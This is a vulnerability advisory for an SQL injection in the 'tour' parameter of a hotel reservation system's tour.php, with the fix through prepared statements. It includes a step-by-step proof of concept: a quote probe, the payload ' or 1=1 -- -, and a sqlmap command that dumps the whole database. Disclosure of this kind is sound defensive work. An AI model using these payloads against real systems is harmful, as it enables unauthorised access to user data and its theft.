CVE-2026-10290

An unauthenticated remote attacker can exploit this vulnerability by manipulating the 'tour' GET parameter in the tour.php file. By injecting SQL metacharacters, such as a single quote, an attacker can break the intended SQL query. Further manipulation with payloads like ' or 1=1 -- - can lead to successful SQL injection, allowing for data extraction or modification [ref_id=1].

The vulnerability resides in the tour.php file, specifically within the handling of the 'tour' GET parameter. The code directly assigns the value of $_GET['tour'] to the $tourID variable and then interpolates this variable into a raw SQL query: "SELECT * FROM tourism WHERE id = '{$tourID}' " [ref_id=1].

The advisory indicates that the fix involves using prepared statements instead of direct query interpolation. This approach separates the SQL code from the user-supplied data, preventing malicious input from being interpreted as SQL commands. The example shows preparing a statement with a placeholder and binding the user input to it, ensuring data integrity [ref_id=1].

Setup: Install Hotel and Tourism Reservation System 1.0 on XAMPP and access at http://<target>/ht/ Step 1 — Visit any tour page as an unauthenticated user: http://<target>/ht/tour.php?tour=4 Step 2 — Inject a single quote to break the SQL query and confirm the vulnerability: http://<target>/ht/tour.php?tour=' Result: Fatal MySQL error is thrown — confirming unsanitized input reaches the SQL query. Step 3 — Confirm SQLi with a boolean-based payload: http://<target>/ht/tour.php?tour=' or 1=1 -- - Result: Page loads normally with tour data — boolean injection successful. Step 4 — Dump the entire database using sqlmap: sqlmap -r sqli.txt --dump --batch Result: sqlmap successfully dumps all tables in hotel_db including users, rooms, tour_reserves, gallery — full database compromise confirmed. [ref_id=1]